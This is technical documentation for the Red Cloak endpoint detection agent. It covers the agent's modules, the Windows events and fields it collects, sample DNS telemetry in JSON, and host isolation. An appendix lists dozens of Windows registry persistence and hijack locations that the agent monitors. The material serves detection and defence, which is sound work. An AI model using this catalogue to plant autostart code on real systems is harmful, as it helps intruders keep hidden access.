Red Cloak Endpoint Agent Technical Details
integrations endpoints red cloak secureworks edr
This topic contains information about the Red Cloak™ Endpoint Agent and the types of information collected for the purpose of threat identification.
The Red Cloak Endpoint Agent consists of multiple modules that provide distinct functionality and features. As with any software it is impossible to test all possible system configurations, which is why we recommend installing and testing on multiple images within your environment before deployment.
Agent Overview ⫘
Windows Agent Modules ⫘
All modules are currently available for the Red Cloak Endpoint Agent for Windows. Navigate to the Module Overview section to view details for each.
Linux Agent Modules ⫘
The following modules are currently available for the Red Cloak Endpoint Agent for Linux. Click each module to navigate to the corresponding module details.
System Resources ⫘
- The agent typically runs with Low CPU Priority.
- The agent consumes < 5MB of network bandwidth per day.
- The agent on average consumes less than 100MB of RAM, with a working limit of 600MB.
- The agent is limited to 300MB of disk space by default.
- This rarely happens, in most instances it is due to the inability for a host to check in. When this occurs, old data is overwritten by new data.
The disk usage limit is configurable, but we recommend leaving the default configuration. You can also disable certain modules as part of the build process or by working with Product Support to use a host command for configuration changes, but Secureworks recommends leaving all modules enabled to provide the highest level of visibility and detection capabilities.
Network Connectivity ⫘
The Red Cloak Endpoint Agent communicates with the cluster over port 443 using TLS v1.2 with a strong cipher suite. By default, the agent checks in every 20 minutes and keeps the connection alive for ten minutes. Known vulnerabilities in SSL/TLS are either not applicable to Red Cloak Endpoint Agent or are mitigated through the following:
- Cipher renegotiation — Red Cloak Endpoint Agent supports only secure renegotiation, with a strong cipher suite.
- SSL version downgrade — SSLv2 (DROWN) and SSLv3 (POODLE) are not supported and are therefore not available for downgrade.
- Weak cipher suites (e.g. FREAK attack, RC4) — not supported and are therefore not available for downgrade.
- Attacks against compression (CRIME, BREACH) — applicable to all versions of TLS (and other protocols).
Open Source Software ⫘
The Red Cloak Endpoint Agent makes use of open source software. The following is a list of the open source packages used and where to download the software.
Module Overview ⫘
AuthTap Module ⫘
The AuthTap module is designed to capture all events related to authentication of users and the explicit use of credentials on a host. While the module is capable of capturing other Windows events, this is generally only used in specific Targeted Threat Hunt situations. In addition, the module is capable of capturing past events from the system, which is useful for looking at historical Windows event log data.
By default, the AuthTap module of the most recent agent version captures the following Windows Events:
WID | Description |
---|---|
21 | Remote Desktop Services: Session logon succeeded |
22 | Remote Desktop Services: Shell start notification received |
104 | The Application log file was cleared |
106 | This event is logged when the user registered the Task Scheduler task |
141 | This event is logged when user deleted Task Scheduler task |
1102 | The audit log was cleared |
1104 | The security log is now full |
4624 | An account was successfully logged on |
4625 | An account failed to log on |
4648 | A logon was attempted using explicit credentials |
4672 | Special privileges assigned to new logon |
4720 | A user account was created |
4722 | A user account was enabled |
4724 | An attempt was made to reset an account’s password |
4725 | A user account was disabled |
4726 | A user account was deleted |
4728 | A member was added to a security-enabled global group |
4732 | A member was added to a security-enabled local group |
4735 | A security-enabled local group was changed |
4738 | A user account was changed |
4739 | Domain Policy was changed |
4740 | A user account was locked out |
4742 | A computer account was changed |
4756 | A member was added to a security-enabled universal group |
4768 | A Kerberos authentication ticket (TGT) was requested (Logged on domain controllers) |
4769 | A Kerberos service ticket was requested |
4770 | A Kerberos service ticket was renewed |
4771 | Kerberos pre-authentication failed |
4776 | The domain controller attempted to validate the credentials for an account |
4777 | The domain controller failed to validate the credentials for an account |
4794 | An attempt was made to set the Directory Services Restore Mode administrator password |
In addition, the following data fields are collected from the events:
- Subject User Name
- Subject Domain Name
- Subject Logon ID
- Target User Name
- Target Domain Name
- Target Logon ID
- Logon Type
- Logon Process Name
- Authentication Package Name
- Privilege List
- Sam Account Name
- User Principle Name
- Home Directory
Cyclorama Module ⫘
The Cyclorama module is responsible for monitoring thread injection events and collecting information related to the injection. When a remote thread injection occurs, Cyclorama tries to grab the first 256 bytes of data from the beginning execution address of the new thread; however, the event will be dropped at the server if the event does not contain data in the first 256 bytes or if the first 256 bytes are null. It is also important to point out that if the name lsass
is in the target process name, the event is never dropped, as we still want to record any injection attempts against lsass. The Cyclorama module collects the following information:
- Source Process Create Time
- Source Process ID
- Source Process Name
- Target Process Create Time
- Target Process ID
- Target Process Name
- Thread ID
- Thread Start Address
- Thread Start Mapping Path
- Thread Start Bytes
Entwine Module ⫘
The Entwine Module collects Event Tracing for Windows (ETW) events, which provide a rich source of data for Windows operating systems from various providers, applications that contain event tracing instrumentation. Entwine collects these events and reports them as JSON to Red Cloak Endpoint Agent to aid in advanced threat hunting by allowing early identification of suspicious and malicious behavior. More information on ETW can be found here: https://docs.microsoft.com/en-us/windows/desktop/etw/about-event-tracing.
The module currently monitors DNS with support to configure other user mode and kernel mode ETW providers in the future. The providers that Entwine subscribes to are defined in config.bin. Entwine also supports filtering based on event_ids per provider, explained in detail for DNS monitoring in the following section.
Supported Platforms: Entwine runs only on endpoints running Windows 7 or later.
ETW DNS Monitoring ⫘
ETW Provider for DNS Query Events ⫘
- Microsoft-Windows-DNS-Client
- {1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}
Interested Events ⫘
- Event ID — 1015
- Event Message — Name resolution for the name %1 timed out after the DNS server did not respond.
- Example Event — Name resolution timeout (1015)
{
"allowed_domain": [
"62e1ad52"
],
"chan_name": "Microsoft-Windows-DNS Client Events/Operational ",
"color": "UNKNOWN",
"event_data": [
{
"data": "client.wns.windows.com",
"name": "QueryName"
},
{
"data": "16",
"name": "AddressLength"
},
{
"data": "10.0.0.254:53",
"name": "Address"
}
],
"event_id": 1015,
"event_info": {
"dns_query_name": "client.wns.windows.com"
},
"event_msg": "Name resolution for the name client.wns.windows.com timed out after the DNS server 10.0.0.254:53 did not respond. ",
"id": {
"host_id": "62e1ad528d83dae27f9d270b5517d985",
"instance_id": "fed5fc2a-e56c-4252-a8f4-c852a1d07914"
},
"keyword": "0x8000000000000000",
"level": 4,
"pid": 1216,
"provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}",
"provider_name": "Microsoft-Windows-DNS-Client",
"task": 1015,
"tid": 3248,
"timestamp": "2018-10-18T15:31:22.331081"
}
- Event ID — 1016
- Event Message — A name not found error was returned for the name %1. Check to ensure that the name is correct. The response was sent by the server at %3.
- Example Event — Name not found error (1016)
{
"allowed_domain": [
"62e1ad52"
],
"chan_name": "Microsoft-Windows-DNS Client Events/Operational ",
"color": "UNKNOWN",
"event_data": [
{
"data": "wpad.test.net",
"name": "QueryName"
},
{
"data": "16",
"name": "AddressLength"
},
{
"data": "10.0.0.254:53",
"name": "Address"
}
],
"event_id": 1016,
"event_info": {
"dns_query_name": "wpad.test.net"
},
"event_msg": "A name not found error was returned for the name wpad.test.net. Check to ensure that the name is correct. The response was sent by the server at 10.0.0.254:53. ",
"id": {
"host_id": "62e1ad528d83dae27f9d270b5517d985",
"instance_id": "25368a70-ce64-4f5d-9699-9d771d3519e5"
},
"keyword": "0x8000000000000000",
"level": 4,
"pid": 1216,
"provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}",
"provider_name": "Microsoft-Windows-DNS-Client",
"task": 1016,
"tid": 6560,
"timestamp": "2018-10-18T14:43:23.524524"
}
- Event ID — 3018
- Event Message — Cache lookup for name %1, type %2 and option %3 returned %4 with results %5
- Example Event — Cache lookup (3018)
{
"allowed_domain": [
"62e1ad52"
],
"chan_name": "Microsoft-Windows-DNS Client Events/Operational ",
"color": "UNKNOWN",
"event_data": [
{
"data": "v10.vortex-win.data.microsoft.com",
"name": "QueryName"
},
{
"data": "28",
"name": "QueryType"
},
{
"data": "2251800888107008",
"name": "QueryOptions"
},
{
"data": "9701",
"name": "Status"
},
{
"name": "QueryResults"
}
],
"event_id": 3018,
"event_info": {
"dns_query_name": "v10.vortex-win.data.microsoft.com",
"dns_query_result": ""
},
"event_msg": "Cache lookup for name v10.vortex-win.data.microsoft.com, type 28 and option 2251800888107008 returned 9701 with results ",
"id": {
"host_id": "62e1ad528d83dae27f9d270b5517d985",
"instance_id": "9934e99c-66c6-4148-af94-0229facb9580"
},
"keyword": "0x8000000000000000",
"level": 4,
"pid": 1216,
"provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}",
"provider_name": "Microsoft-Windows-DNS-Client",
"tid": 3248,
"timestamp": "2018-10-18T15:10:19.099102"
}
- Event ID — 3020
- Event Message — Query response for name %1, type %2, interface index %3 and network index %4 returned %5 with results %6
- Example Event — Query Response (3020)
{
"allowed_domain": [
"62e1ad52"
],
"chan_name": "Microsoft-Windows-DNS Client Events/Operational ",
"color": "UNKNOWN",
"event_data": [
{
"data": "cluster.rcdaily.cloudops.ctudev.com",
"name": "QueryName"
},
{
"data": "1",
"name": "QueryType"
},
{
"data": "0",
"name": "NetworkIndex"
},
{
"data": "0",
"name": "InterfaceIndex"
},
{
"data": "0",
"name": "Status"
},
{
"data": "34.238.81.39;type: 2 ns-1883.awsdns-43.co.uk;type: 2 ns-139.awsdns-17.com;type: 2 ns-646.awsdns-16.net;type: 2 ns-1175.awsdns-18.org;205.251.192.139;2600:9000:5300:8b00::1;205.251.194.134;2600:9000:5302:8600::1;205.251.196.151;2600:9000:5304:9700::1;205.251.199.91;2600:9000:5307:5b00::1;",
"name": "QueryResults"
}
],
"event_id": 3020,
"event_info": {
"dns_query_name": "cluster.rcdaily.cloudops.ctudev.com",
"dns_query_result": "34.238.81.39;type: 2 ns-1883.awsdns-43.co.uk;type: 2 ns-139.awsdns-17.com;type: 2 ns-646.awsdns-16.net;type: 2 ns-1175.awsdns-18.org;205.251.192.139;2600:9000:5300:8b00::1;205.251.194.134;2600:9000:5302:8600::1;205.251.196.151;2600:9000:5304:9700::1;205.251.199.91;2600:9000:5307:5b00::1;"
},
"event_msg": "Query response for name cluster.rcdaily.cloudops.ctudev.com, type 1, interface index 0 and network index 0 returned 0 with results 34.238.81.39;type: 2 ns-1883.awsdns-43.co.uk;type: 2 ns-139.awsdns-17.com;type: 2 ns-646.awsdns-16.net;type: 2 ns-1175.awsdns-18.org;205.251.192.139;2600:9000:5300:8b00::1;205.251.194.134;2600:9000:5302:8600::1;205.251.196.151;2600:9000:5304:9700::1;205.251.199.91;2600:9000:5307:5b00::1; ",
"id": {
"host_id": "62e1ad528d83dae27f9d270b5517d985",
"instance_id": "c5d19822-8854-494d-ad89-f3dc7bde1e29"
},
"keyword": "0x8000000000000000",
"level": 4,
"pid": 1216,
"provider_guid": "{1C95126E-7EEA-49A9-A3FE-A378B03DDB4D}",
"provider_name": "Microsoft-Windows-DNS-Client",
"tid": 3248,
"timestamp": "2018-10-18T15:34:58.885911"
}
Groundling Module ⫘
Upon installation, the Groundling module captures all persistent programs and monitors persistence locations for any modifications. When a persistence change is detected, the agent collects information related to the change and sends a message back to the Red Cloak Endpoint Agent cluster. The Groundling module collects the following types of information. Please note, this is an abbreviated list due to the size.
Program Information ⫘
- Creation Time
- Last Access Time
- Last Write Time
- Calculated MD5 Hash
- Native Path
- Path
- Path Context
- Calculated SHA1 Hash
- Calculated SHA256 Hash
- Size
- Version Comments
- Company Name
- File Description
- File Version
- Internal Name
- Legal Copyright
- Original File Name
- Product Name
- Product Version
Signature Information ⫘
- Signature Hash
- Signature Issuer Name
- Signature More Info Link
- Signature Program Name
- Signature Publisher Link
- Signature Serial Number
- Signature Subject Name
Registry Information ⫘
- Registry Value Name
- Registry Value
- Value Dword
- Key Path
- Key Root
- User Registry SID
Service Information ⫘
- Description
- Display Name
- Image Path
- Name
- Service DLL
- Service Main
- Start Type
- Status
- Type
Scheduled Task Information ⫘
- Scheduled Task File Information
- Last Run Time
- Working Directory
- Enabled
- Next Run Time
- Task Name
- Etc.
Shortcut Information ⫘
- Description
- File Information
- Creation Time
- File Attributes
- Target Path
- Target Size
- Etc.
The following are examples of locations monitored for persistence changes; the full list can be viewed in the Appendix.
Registry keys ⫘
- AppInit DLLs (e.g.
HKLM\Software\MicrosoftWindows NT\CurrentVersion\Windows
) - Boot execute (e.g.
HKLM\SYSTEM\CurrentControlSet\Control\Session
) - Codecs (e.g.
HKCU\Software\MicrosoftWindows NT\CurrentVersion\Drivers32
) - Drivers (e.g.
HKLM\SYSTEM\CurrentControlSet\Control
) - Explorer (e.g.
HKCU\SOFTWARE\Classes\Protocols\Filter
) - Image hijacks (e.g.
HKLM\SOFTWARE\Classes\Exefile\Shell\Open\Command
) - Internet Explorer (e.g.
HKLM\Software\Wow6432Node\Microsoft\Internet
) - Known DLLs (e.g.
HKLM\System\CurrentControlSet\Control\Session
) - Logon (e.g.
HKLM\SOFTWARE\MicrosoftWindows NT\CurrentVersion\Winlogon\Userinit
) - LSA Providers (e.g.
HKLM\SYSTEM\CurrentControlSet\Control\LsaSecurity Packages
) - Network providers (e.g.
HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order
) - Print Monitors (e.g.
HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors
) - Services (e.g.
HKLM\System\CurrentControlSet\Services
) - Winsock Providers (e.g.
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
) - Winlogon (e.g.
HKLM\SYSTEM\Setup\CmdLine
)
Program locations ⫘
- Sidebar gadgets
Scheduled tasks ⫘
- We use the task scheduler API to enumerate tasks
Configuration Settings ⫘
Red Cloak Endpoint Agent prevents external scripts from removing Windows domain user profiles, as the Groundling and Inspector™ modules load profiles for monitoring. To allow external scripts to remove domain user profiles, work with Product Support to alter the Windows Profile loading pattern for Groundling and Inspector™ via Host Command. The default value for Groundling is Always, with Always and Smart as recommended.
String | Value | Description |
---|---|---|
groundling.profile_load | Always | Groundling loads all profiles upon startup, never unloading them |
Smart | Groundling loads all profiles upon startup, but unloads them right after initial scan (10-30 minutes on average) | |
Never | Groundling does not load additional user profiles, thus losing effectiveness |
Note
This setting must be coordinated with the inspector.profile_load value if both modules are enabled; for example, use the Always/Always, Smart/Smart or Never/Never values for each module. Smart (Groundling) may also be combined with Never (Inspector™). The Smart value in Inspector™ is not recommended as it can cause Windows profile issues.
Hostel Module ⫘
The Hostel module on the Red Cloak Endpoint Agent agent is the software that is responsible for performing Host Isolation. Isolating an endpoint from network communication (except to Secureworks® Taegis™ XDR) is performed to prevent lateral spreading of threats from an infected host to healthy hosts. Once a host has been isolated and its threat removed, it can be reintegrated and connected back to full network access.
Isolation ⫘
Isolating an endpoint from network communication (except to the Secureworks backend itself) is performed to prevent lateral spreading of threats from infected host to healthy hosts. Once isolated hosts have had their threat removed, they can be reintegrated, regaining their full network access. The Hostel module on the agent is the component responsible for performing the isolation tasks.
The agent will not retain the state of isolation in permanent memory across restarts, it will always restart with isolation disabled. Upon the agent's first connection with the platform, it will be instructed as to the desired isolation state.
- Upon reboot or module restart, the host will start up with an automatic isolation OFF
- Once connected to the platform, it sends its current isolation state to the platform as part of a hostel heartbeat message. There may be a short delay at startup before an isolated host receives the command from server and turns isolation back on.
- The platform will compare the received isolation status to the last configured status for this host. If the two states do not match, the it will automatically send the appropriate command to set or unset isolation in order to reconcile the states in an attempt to match the desired state.
When isolation module is enabled and running, an icon will be displayed in the Windows system tray off each endpoint.
Prerequisites for Using Host Isolation with the Red Cloak Endpoint Agent ⫘
- The Hostel module and Host Isolation are supported only for Windows OS (version 7 and higher).
- Agent version 2.0.6.0 and higher support the Hostel module.
- Host Isolation cannot be performed for hosts that have been safelisted.
- Tenant Admins and Secureworks analysts can perform Host Isolation.
For more details on using the Host Isolation feature, see Isolate a Host.
Ignition Module ⫘
The Ignition module is the software that is responsible for performing Remote Agent Upgrade, and is available beginning with Windows Agent version 2.1.4.0.
Once installed, the agent checks in with the Red Cloak Endpoint Agent backend server. At this time the agent configuration specific to that endpoint is uploaded to the server, giving the server visibility to the agent configuration on all endpoints in your domain. When Remote Agent Update is made available and is initiated, the Ignition module pulls down the MSI installer needed, performs the update, and reports back the configuration to the server.
Inspector Module ⫘
The Inspector™ module runs Python based rules that are designed to detect malware, malicious artifacts, or known behaviors and patterns on a host. This module is used with periodic scans in order to scan the host for malicious activity on a recurring basis. By default, periodic scans run every 12 hours. The data collected by this module varies based upon the rule that detects malicious artifacts, but it is similar to what is collected by other modules:
- Signature Information
- File Paths
- Calculated MD5, SHA1, SHA256 values
- Creation Time
- Last Write Time
- Last Access Time
- File Size
- Associated file details
- Etc.
Configuration Settings ⫘
Red Cloak Endpoint Agent prevents external scripts from removing Windows domain user profiles, as the Inspector™ and Groundling modules load profiles for monitoring. To allow external scripts to remove domain user profiles, work with Product Support to alter the Windows Profile loading pattern for Inspector™ and Groundling via Host Command. The default value for Inspector™ is Always, with Always and Never as recommended.
String | Value | Description |
---|---|---|
inspector.profile_load | Always | Inspector™ loads all profiles upon startup, never unloading them |
Smart | Inspector™ loads profiles before scan (periodic or regular), and unloads them right after | |
Never | Inspector™ does not load additional user profiles, thus losing effectiveness |
Note
This setting must be coordinated with the groundling.profile_load value if both modules are enabled; for example, use the Always/Always, Smart/Smart or Never/Never values for each module. Smart (Groundling) may also be combined with Never (Inspector™). The Smart value in Inspector™ is not recommended as it can cause the Windows profiles issue.
Lacuna Module ⫘
The Lacuna module is responsible for capturing inbound and outbound network connection data, both TCP and UDP. It is also responsible for capturing DNS resolution and queries. The Lacuna module collects the following information:
Network Data (IP)** ⫘
- Destination IP
- Destination Port
- Process ID
- Create Time
- End Time
- Local IP
- Local Port
- Protocol
- Bytes Sent
- Bytes Received
- Connection Direction
Network Data (DNS) ⫘
- Query Time
- Process ID
- Query Type
- Query Name
- RDATA
Mukluk Module ⫘
The Mukluk module is the core Red Cloak Endpoint Agent module. It is responsible for coordinating and managing all of the modules and settings for the agent. Mukluk is required for all deployments and handles the following tasks:
- Installs and updates services, programs, and configurations for all modules and components
- Manages inspector rules
- Handles bi-directional communications with the Red Cloak Endpoint Agent infrastructure
- Responsible for starting and stopping the Red Cloak Endpoint Agent modules
- Responsible for managing disk utilization
- Responsible for enabling and disabling modules
- Handles host commands, which allow privileged Product Support users to perform system level tasks
- Handles file fetching requests for further analysis
Procwall Module ⫘
The Procwall module is responsible for monitoring process creation events. The Procwall module collects the following information:
Process Information** ⫘
- Process Create Time
- Process ID
- Parent Process ID
- Parent Process Create Time
- Image Path
- Command Line
- Username
Program Information** ⫘
- File Description
- Company Name
- Product Name
- Product Version
- File Version
- Comments
- Legal Copyright
- Internal Name
- Original File Name
Signature Information** ⫘
- Signature Hash
- Signature Program Name
- Signature Publisher Link
- Signature More Info Link
- Signature Serial Number
- Signature Issuer Name
- Signature Subject Name
Appendix ⫘
Groundling Monitored Persistence Locations ⫘
# | Category | Sub-Category | Bases | Key |
---|---|---|---|---|
1 | APPINIT DLL | APP CERT DLL | HKLM | System\CurrentControlSet\Control\Session Manager\AppCertDlls |
2 | APPINIT DLL | APP INIT DLL | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls |
3 | APPINIT DLL | APP INIT DLL | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Appinit_Dlls |
4 | BOOT EXECUTE | BOOT EXECUTE | HKLM | System\CurrentControlSet\Control\Session Manager\BootExecute |
5 | BOOT EXECUTE | EXECUTE | HKLM | System\CurrentControlSet\Control\Session Manager\Execute |
6 | BOOT EXECUTE | S0 INITAL COMMAND | HKLM | System\CurrentControlSet\Control\Session Manager\S0InitialCommand |
7 | BOOT EXECUTE | SERVICE CONTROL MANAGER EXTENSION | HKLM | System\CurrentControlSet\Control\ServiceControlManagerExtension |
8 | BOOT EXECUTE | SETUP EXECUTE | HKLM | System\CurrentControlSet\Control\Session Manager\SetupExecute |
9 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance* |
10 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance* |
11 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Classes\CLSID{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance* |
12 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Classes\CLSID{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance* |
13 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Wow6432Node\Classes\CLSID{083863F1-70DE-11d0-BD40-00A0C911CE86}\Instance* |
14 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Wow6432Node\Classes\CLSID{7ED96837-96F0-4812-B211-F13C24117ED3}\Instance* |
15 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Wow6432Node\Classes\CLSID{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\Instance* |
16 | CODEC | CODEC INSTANCE | HKCU HKLM | Software\Wow6432Node\Classes\CLSID{AC757296-3522-4E11-9862-C17BE5A1767E}\Instance* |
17 | CODEC | DRIVER | HKLM | SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32 |
18 | CODEC | DRIVER | HKCU | Software\Microsoft\Windows NT\CurrentVersion\Drivers32 |
19 | CODEC | DRIVER | HKCU HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Drivers32 |
20 | CODEC | FILTER | HKCU HKLM | Software\Classes\Filter* |
21 | EXPLORER | COLUMN HANDLER | HKCU HKLM | Software\Classes*\ShellEx\ColumnHandlers* |
22 | EXPLORER | COLUMN HANDLER | HKLM | Software\Wow6432Node\Classes*\ShellEx\ColumnHandlers* |
23 | EXPLORER | CONTEXT MENU | HKCU HKLM | Software\Classes*\ShellEx\ContextMenuHandlers* |
24 | EXPLORER | CONTEXT MENU | HKLM | Software\Wow6432Node\Classes*\ShellEx\ContextMenuHandlers* |
25 | EXPLORER | COPY HOOK | HKCU HKLM | Software\Classes*\ShellEx\CopyHookHandlers* |
26 | EXPLORER | COPY HOOK | HKLM | Software\Wow6432Node\Classes*\ShellEx\CopyHookHandlers* |
27 | EXPLORER | DRAG DROP | HKCU HKLM | Software\Classes*\ShellEx\DragDropHandlers* |
28 | EXPLORER | DRAG DROP | HKLM | Software\Wow6432Node\Classes*\ShellEx\DragDropHandlers* |
29 | EXPLORER | EXT SHELL FOLDER VIEW | HKCU HKLM | Software\Classes*\ShellEx\ExtShellFolderViews* |
30 | EXPLORER | EXT SHELL FOLDER VIEW | HKLM | Software\Wow6432Node\Classes*\ShellEx\ExtShellFolderViews* |
31 | EXPLORER | PROPERTY SHEET | HKCU HKLM | Software\Classes*\ShellEx\PropertySheetHandlers* |
32 | EXPLORER | PROPERTY SHEET | HKLM | Software\Wow6432Node\Classes*\ShellEx\PropertySheetHandlers* |
33 | EXPLORER | PROTOCOL FILTER | HKCU HKLM | Software\Classes\Protocols\Filter*\CLSID |
34 | EXPLORER | PROTOCOL FILTER | HKLM | Software\Wow6432Node\Classes\Protocols\Filter*\CLSID |
35 | EXPLORER | SHELL ICON OVERLAY | HKCU HKLM | Software\Classes*\ShellEx\ShellIconOverlayIdentifiers* |
36 | EXPLORER | SHELL ICON OVERLAY | HKLM | Software\Wow6432Node\Classes*\ShellEx\ShellIconOverlayIdentifiers* |
37 | EXPLORER | STARTMENUINTERNET | HKCU HKLM | Software\Clients\StartMenuInternet*\shell\open\command |
38 | EXPLORER | STARTMENUINTERNET | HKLM | Software\Wow6432Node\Clients\StartMenuInternet*\shell\open\command |
39 | EXPLORER PROTOCOL HANDLER | HKCU HKLM | Software\Classes\Protocols\Handler*\CLSID | |
40 | EXPLORER PROTOCOL HANDLER | HKLM | Software\Wow6432Node\Classes\Protocols\Handler*\CLSID | |
41 | EXPLORER PROTOCOL HANDLER | EXPLORER APPLICATION SHELL | HKCU HKLM | Software\Classes\Applications*\shell* |
42 | EXPLORER PROTOCOL HANDLER | EXPLORER APPLICATION SHELL | HKLM | Software\Wow6432Node\Classes\Applications*\shell* |
43 | EXPLORER PROTOCOL HANDLER | EXPLORER APPROVED SHELL EXTENSION | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved* |
44 | EXPLORER PROTOCOL HANDLER | EXPLORER APPROVED SHELL EXTENSION | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved* |
45 | EXPLORER PROTOCOL HANDLER | EXPLORER CTF LANGBARADDIN | HKCU HKLM | Software\Microsoft\Ctf\LangBarAddin*\Enable |
46 | EXPLORER PROTOCOL HANDLER | EXPLORER DESKTOP COMPONENT | HKCU | SOFTWARE\Microsoft\Internet Explorer\Desktop\Components*\Source |
47 | EXPLORER PROTOCOL HANDLER | EXPLORER NETWORK SHARING HANDLER | HKLM | SOFTWARE\Classes\Network\SharingHandler\ |
48 | EXPLORER PROTOCOL HANDLER | EXPLORER SHARED TASK SCHEDULER | HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
49 | EXPLORER PROTOCOL HANDLER | EXPLORER SHARED TASK SCHEDULER | HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers |
50 | EXPLORER PROTOCOL HANDLER | EXPLORER SHARED TASK SCHEDULER | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler |
51 | EXPLORER PROTOCOL HANDLER | EXPLORER SHARED TASK SCHEDULER | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers |
52 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLEXECUTE HOOK | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks* |
53 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLEXECUTE HOOK | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks* |
54 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLSERVICE OBJECT | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects* |
55 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLSERVICE OBJECT | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellServiceObjects* |
56 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLSERVICE OBJECT DELAYLOAD | HKCU HKLM | Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad* |
57 | EXPLORER PROTOCOL HANDLER | EXPLORER SHELLSERVICE OBJECT DELAYLOAD | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad* |
58 | IMAGE HIJACK | CMD AUTORUN | HKCU HKLM | Software\Microsoft\Command Processor\Autorun |
59 | IMAGE HIJACK | CMD AUTORUN | HKCU HKLM | Software\Wow6432Node\Microsoft\Command Processor\Autorun |
60 | IMAGE HIJACK | CMD STARTUP | HKCU HKLM | Software\Microsoft\Command Processor\Startup |
61 | IMAGE HIJACK | CMD STARTUP | HKCU HKLM | Software\Wow6432Node\Microsoft\Command Processor\Startup |
62 | IMAGE HIJACK | DEBUGGER | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options |
63 | IMAGE HIJACK | DEBUGGER | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options |
64 | INTERNET EXPLORER | BHO | HKLM | Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects* |
65 | INTERNET EXPLORER | BHO | HKLM | Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects* |
66 | INTERNET EXPLORER | DEFAULT ICON | HKCU HKLM | Software\Classes\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\shell\NoAddOns\Command\ |
67 | INTERNET EXPLORER | DEFAULT ICON | HKCU HKLM | Software\Wow6432Node\Classes\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\shell\NoAddOns\Command\ |
68 | INTERNET EXPLORER | EXPLORER BAR | HKCU HKLM | Software\Microsoft\Internet Explorer\Explorer Bars** |
69 | INTERNET EXPLORER | EXPLORER BAR | HKCU HKLM | Software\Wow6432Node\Microsoft\Internet Explorer\Explorer Bars** |
70 | INTERNET EXPLORER | EXTENSION | HKCU HKLM | Software\Microsoft\Internet Explorer\Extensions** |
71 | INTERNET EXPLORER | EXTENSION | HKCU HKLM | Software\Wow6432Node\Microsoft\Internet Explorer\Extensions** |
72 | INTERNET EXPLORER | TOOLBAR | HKCU HKLM | Software\Microsoft\Internet Explorer\Toolbar** |
73 | INTERNET EXPLORER | TOOLBAR | HKCU HKLM | Software\Wow6432Node\Microsoft\Internet Explorer\Toolbar** |
74 | INTERNET EXPLORER | URLSEARCHHOOK | HKCU HKLM | Software\Microsoft\Internet Explorer\UrlSearchHooks* |
75 | INTERNET EXPLORER | URLSEARCHHOOK | HKCU HKLM | Software\Wow6432Node\Microsoft\Internet Explorer\UrlSearchHooks* |
76 | KNOWN DLL | HKLM | System\CurrentControlSet\Control\Session Manager\KnownDlls | |
77 | LOGON | HKLM | Software\Microsoft\Windows CE Services\AutoStartOnConnect | |
78 | LOGON | HKLM | Software\Microsoft\Windows CE Services\AutoStartOnDisconnect | |
79 | LOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Windows\IconServiceLib | |
80 | LOGON | HKLM | Software\Microsoft\Windows NT\CurrentVersion\Windows\Logon | |
81 | LOGON | HKLM | Software\Wow6432Node\Microsoft\Windows CE Services\AutoStartOnConnect | |
82 | LOGON | HKLM | Software\Wow6432Node\Microsoft\Windows CE Services\AutoStartOnDisconnect | |
83 | LOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\IconServiceLib | |
84 | LOGON | HKLM | Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\Logon | |
85 | LOGON | ALTERNATE SHELL | HKLM | SYSTEM\CurrentControlSet\Control\SafeBoot\AlternateShell |
